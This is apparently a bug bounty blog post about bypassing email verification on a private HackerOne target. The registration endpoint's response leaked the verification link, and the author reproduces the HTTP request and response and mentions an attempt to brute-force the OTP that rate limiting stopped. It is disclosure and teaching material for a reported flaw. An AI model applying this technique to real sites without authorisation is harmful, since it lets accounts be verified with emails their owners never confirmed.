How I was Able To Bypass Email Verification

Hello Masters and Learner I hope you are doing well and always put your efforts to secure the world so that no can get benefits unethically.

the main reason why i am writing this article is that sometime when we lose hope that time we just need to think outside of the box xD .

While testing h1 private site for finding some basic issues i found that the site have email verification mechanism. The main function of this mechanism is to send a 4 digit(OTP) verification code and email link to the user provided email.I thought how can i bypass it ūüôā

Try to Brute force verification code but failed they have rate limit there i thought  that i m failed to get bypass.

But wait try one more  time  i go through  burp http Req history and found this request interesting which is used for adding email.

Request:

POST /registerNewUser HTTP/1.1

Host: www.site.com

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate

Referer: https://www.site.comlogin

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 171

Cookie: foo

DNT: 1 Connection: close givenName=test&familyName=test&gender=0&email=test@gmail.com&tz=20&agreePrivAndTC=true&password=value&action=send-verification-web

I Tried to  Add Such test@gmail.com as email  i get shocked by  viewing the Repose because it leaking the verification link.

Response:

HTTP/1.1 200 OK Server: nginx

Date: Thu, 28 Jun 2018 06:47:49 GMT

Content-Type: application/json; charset=utf-8

Content-Length: 54 Connection: close X-Powered-By: Express Cache-Control: private, no-cache, no-store, must-revalidate Expires: -1 Pragma: no-cache

Access-Control-Allow-Origin: *

X-Frame-Options: SAMEORIGIN

ETag: W/”36-zOgjh98O1kXD4SR66HqUdT6UxdM”

Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{“key”:”the verification link”,”success”:1}

After seeing the  verification link my feeling was.

I just Reported the issue  and rewarded $200 bounty for this issue.

 

 

 

 

About the Author

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: